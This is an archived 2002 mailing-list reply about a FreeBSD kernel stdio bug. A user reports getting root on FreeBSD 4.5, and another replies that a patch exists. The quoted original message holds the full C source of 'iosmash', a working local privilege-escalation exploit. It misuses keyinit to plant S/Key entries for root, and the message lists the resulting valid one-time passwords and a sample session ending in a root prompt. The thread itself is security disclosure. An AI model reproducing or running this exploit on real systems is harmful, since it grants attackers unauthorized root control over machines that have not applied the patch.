Vulnerability Development mailing list archives
Re: cheers
From: zeno <bugtraq () cgisecurity net>
Date: Wed, 24 Apr 2002 16:58:52 -0400 (EDT)
Even on my FreeBSD 4.5 STABLE, I got root access. This is terrifying. :-) So any solutions?
cvsup new source rebuild kernel. A patch is out already. - zeno () cgisecurity com
----- Original Message ----- From: "KF" <dotslash () snosoft com> To: "bugtraq" <bugtraq () securityfocus org>; "vuln-dev" <vuln-dev () security-focus com> Sent: Tuesday, April 23, 2002 1:24 AM Subject: cheershttp://www.phased.home.ro/iosmash.c -KF---------------------------------------------------------------------------- ----/* phased/b10z phased () snosoft com 23/04/2002 stdio kernel bug in All releases of FreeBSD up to and including4.5-RELEASEdecided to make a trivial exploit to easily get root :) > id uid=1003(phased) gid=999(phased) groups=999(phased) > ./iosmash Adding phased: <--- HIT CTRL-C ---> > su s/key 98 snosoft2 Password:MASS OAT ROLL TOOL AGO CAM xes# this program makes the following skeys valid 95: CARE LIVE CARD LOFT CHIC HILL 96: TESS OIL WELD DUD MUTE KIT 97: DADE BED DRY JAW GRAB NOV 98: MASS OAT ROLL TOOL AGO CAM 99: DARK LEW JOLT JIVE MOS WHO http://www.snosoft.com cheers Joost Pol */ #include <stdio.h> #include <unistd.h> int main(int argc, char *argv[]) { while(dup(1) != -1); close(2); execl("/usr/bin/keyinit", "\nroot 0099 snosoft2 6f648e8bd0e2988a Apr 23,2666 01:02:03\n"); }
Current thread:
- cheers KF (Apr 22)
- Re: cheers Foldi Tamas (Apr 24)
- Re: cheers Onie Camara (Apr 24)
- Re: cheers Onie Camara (Apr 24)
- Re: cheers KF (Apr 24)
- Re: cheers Onie Camara (Apr 24)
- Re: cheers KF (Apr 24)
- Re: cheers KF (Apr 24)
- Re: cheers Edsel Adap (Apr 24)
- <Possible follow-ups>
- Re: cheers zeno (Apr 24)
- Re: cheers Onie Camara (Apr 25)
- RE: cheers Knud Erik Hojgaard (Apr 25)